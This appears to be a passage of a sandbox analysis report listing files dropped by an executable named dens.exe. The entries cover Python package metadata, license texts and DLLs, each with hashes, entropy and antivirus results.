                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5
                                                                                                                                                                                                                                            Entropy (8bit):1.9219280948873623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:m:m
                                                                                                                                                                                                                                            MD5:9B929466EC7848714DE24BCF75AE57CB
                                                                                                                                                                                                                                            SHA1:ECC9237295CDA9B690BE094E58FAE1458A4B0389
                                                                                                                                                                                                                                            SHA-256:8806DDA121DF686A817D56F65EE47D26A4901C2A0EB0EB46EB2F42FCB4A9A85C
                                                                                                                                                                                                                                            SHA-512:C8D8967BE2B5094A5D72BA4BEF5DBDA2CBF539BF3B8B916CF86854087A12DF82B51B7BF5B6EFA79898692EFD22FAD9688058448CAAB198FB708A0E661DC685EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:zipp.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1541912
                                                                                                                                                                                                                                            Entropy (8bit):6.576517980395355
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:OU/QhAI889YyuQYZlm/8AgzMkf6G5MJ8NW/yKhh+ivz/LZ/Xm+5D3ovTDJl:HVyuQYZlm/8vP6G5MJ8NuF+IzDZ/XPoP
                                                                                                                                                                                                                                            MD5:F3592DA629E4F247598E232B2CBFBAC1
                                                                                                                                                                                                                                            SHA1:65429FBEC3F5545640F2CDA784DC7DCCA420EB3B
                                                                                                                                                                                                                                            SHA-256:054A7B736DE7AFBD447B07EE5E72DF2FEBCAA06758F7A028873771567E8735D3
                                                                                                                                                                                                                                            SHA-512:6FC24890A7BE1ED73F1EFDF2B7723C3A7DE5DDB36B87FF7B01949FC2B14813E7B7C8B8311ABEE2796A9A4EFFFEDFC1D2020FFA794E59004CA4FB6798B993190D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1130
                                                                                                                                                                                                                                            Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                                            MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                                            SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                                            SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                                            SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3717
                                                                                                                                                                                                                                            Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                                            MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                                            SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                                            SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                                            SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2402
                                                                                                                                                                                                                                            Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                                            MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                                            SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                                            SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                                            SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):48
                                                                                                                                                                                                                                            Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                                            MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                                            SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                                            SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                                            SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10
                                                                                                                                                                                                                                            Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:LEJn:M
                                                                                                                                                                                                                                            MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                                            SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                                            SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                                            SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1016584
                                                                                                                                                                                                                                            Entropy (8bit):6.669319438805479
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                                                                                                                                                                            MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                                                                                                                                                                            SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                                                                                                                                                                            SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                                                                                                                                                                            SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1138456
                                                                                                                                                                                                                                            Entropy (8bit):5.4620027688967845
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:arEHdcM6hbuCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAIU:arEXDCjfk7bPNfv42BN6yzUAIU
                                                                                                                                                                                                                                            MD5:A8ED52A66731E78B89D3C6C6889C485D
                                                                                                                                                                                                                                            SHA1:781E5275695ACE4A5C3AD4F2874B5E375B521638
                                                                                                                                                                                                                                            SHA-256:BF669344D1B1C607D10304BE47D2A2FB572E043109181E2C5C1038485AF0C3D7
                                                                                                                                                                                                                                            SHA-512:1C131911F120A4287EBF596C52DE047309E3BE6D99BC18555BD309A27E057CC895A018376AA134DF1DC13569F47C97C1A6E8872ACEDFA06930BBF2B175AF9017
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1107
                                                                                                                                                                                                                                            Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                                            MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                                            SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                                            SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                                            SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2153
                                                                                                                                                                                                                                            Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                                            MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                                            SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                                            SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                                            SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4557
                                                                                                                                                                                                                                            Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                                            MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                                            SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                                            SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                                            SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):104
                                                                                                                                                                                                                                            Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                            MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                            SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                            SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                            SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):55808
                                                                                                                                                                                                                                            Entropy (8bit):5.781337979621736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:WknJ07sWZTpdvhPoxU66zWc/lzLehKhdtShQQvCQLxZpiSMcVVLh:WV48bvhPoxU7Nlve8tSJ+SMM
                                                                                                                                                                                                                                            MD5:863A566F7C2A76B8A23AC30E04C0DACF
                                                                                                                                                                                                                                            SHA1:DF75C0D04810F3027A5E182EAD3EFBAF7616C07C
                                                                                                                                                                                                                                            SHA-256:DE569177BEC7668C01A82B8BE7F56DD25F13FE296432715B1035B57153453BBC
                                                                                                                                                                                                                                            SHA-512:D9135CA93A56642AD80B4F04C1EE1647207CF9CDC19943696D7A710F1CA680435A931F22829078A0C85766DBAE2E9E3C768A7C681D92FCA8D65CF32D53558152
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):97792
                                                                                                                                                                                                                                            Entropy (8bit):5.988158419392648
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:cfnVt5r+NtMILQN+Hfrxn9hXdV4SKKSODPXj7AZeN8mGEqCMy:sVtkfMuosfR9h/4SRSODPXH8pE
                                                                                                                                                                                                                                            MD5:35FA0191828509C2BB02684F36DDC796
                                                                                                                                                                                                                                            SHA1:68FAF30484482E465106C449ABEAFA5741F16541
                                                                                                                                                                                                                                            SHA-256:19D8E8F4293B3ABACB4DB9E68CF402B9A24A260FAAC7DF7EC373D7DDC6DD7EC4
                                                                                                                                                                                                                                            SHA-512:E468F4FB5B8428ADD59DBAAFCEE5F536C9F24771B9FB2B7754445AF2925EF286BBE283951CC1C1E2A5CE33BD311B51A8A7D44E06BE9E5663BE4D19FCACD51115
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
